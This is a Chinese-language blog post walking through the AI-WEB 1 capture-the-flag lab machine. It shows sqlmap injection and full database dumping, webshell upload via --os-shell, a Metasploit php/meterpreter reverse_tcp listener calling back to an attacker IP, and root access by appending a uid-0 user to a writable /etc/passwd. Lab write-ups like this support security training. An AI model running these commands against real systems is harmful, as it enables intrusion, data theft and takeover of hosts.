freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

红队专项·AI-WEB 1
wIngy 2023-06-07 10:29:57 117384
所属地 重庆

前言
标是获取获得root权限并找到flag.txt文本信息,本环境被评定为中级难度。希望大家通过此靶机学习到一些红队知识。
请注意,本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。果列出的技术用于其他任何目标,本站及作者概不负责。

信息收集
由于我使用的是桥接模式所以我先用arp-scan确定了一下目标ip
image

namp扫描端口和服务

image

http服务开放80端口,探测到了robots.txt,并且存在路径信息

查看发现

image

进行访问

image

都是没有权限访问

然后这个se3路径可以访问且可以有数据查询功能

image

明眼人一看这熟悉的操作,当然第一选sql注入啊

渗透攻克
上sqlmap

image

存在注入

爆数据库名:--current-db

image

爆表名:--tables -D "xxxx"

image

爆表中的字段名:--columns -T xxxx -D xxxxx

image

dump出字段的值

也可以知道了数据库的名字,列举出此数据库中的所有东西

-D xxxxx --dump-all –batch

image

这里就算是全部搞定了,这里我偷懒了直接dumpall,大家实战最好别这样

建立初始访问点(拿shell)

因为我们目前数据库就在眼前,优先尝试数据库拿shell(这里写3种)
先查看此数据库的权限:--privileg --batch

image

FILE权限 可以对服务器本地文件进行操作

尝试使用os_shell直接得到shell
PS:
使用OS_shell的条件
(1)具有file权限
(2)攻击者需要知道网站的绝对路径
(3)GPC为off,php主动转义的功能关闭

现在第一点已经ok ,但是现在的问题是我不知道绝对路径

我收集信息时忽略了一点,忘记了可以对子目录的子目录进行扫描

image

image

不愧是我,

绝对路径:

image

被禁用的函数

image

思路一,利用os-shell写webshell

sqlmap -r post.txt --os-shell

image
image

下一步提权(利用执行os_shell留下来的上传页面 上传php恶意脚本,反弹shell)

http://172.46.230.8:80/se3reTdir777/uploads/tmpujzmb.php

image

image

image

成功连接

利用python生成一个可交互的shell

python -c 'import pty;pty.spawn("/bin/bash")'

image

还是没有权限,

思路二,file-dest写入木马

利用msfvenom写一个php的webshell

image

要把/*删除

先msf监听,后sqlmap写入

设置

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 172.46.229.39
set lport 1234

三,直接通过os-shell的哪个提交页面进行上传php的webshell

image

以上方式均可成功执行

权限提升

这里就有很多方式了。我一般会先丢工具先自动跑一下
这里这个最简单
查找全局可写文件

find / -writable -type d 2>/dev/null #文件夹

find / -writable -type f 2>/dev/null #文件

image

现在是www-data用户是对/etc/passwd的可写权限。可以添加用户到/etc/passwd文件中

perl -le 'print crypt("1q2w3e4r","salt")'

将用户wIngy和密码1q2w3e4r,生成的密码hash添加到/etc/paaswd中

echo "wIngy:saPxWonD/gnR6:0:0:hacker:/root:/bin/bash" >> /etc/passwd

su wIngy切换用户即可

总结

虽然是中级难度,但是打下来发现还是比较简单,没有过多的兔子洞,可以巩固一下渗透思路

# 渗透测试 # 工具使用 # 红队
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 wIngy 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
wIngy LV.3
jocker!!!
  • 7 文章数
  • 6 关注者
红队专项·Icarus
2023-06-17
红队专项·Five
2023-06-13
红队专项·BaseME
2023-06-12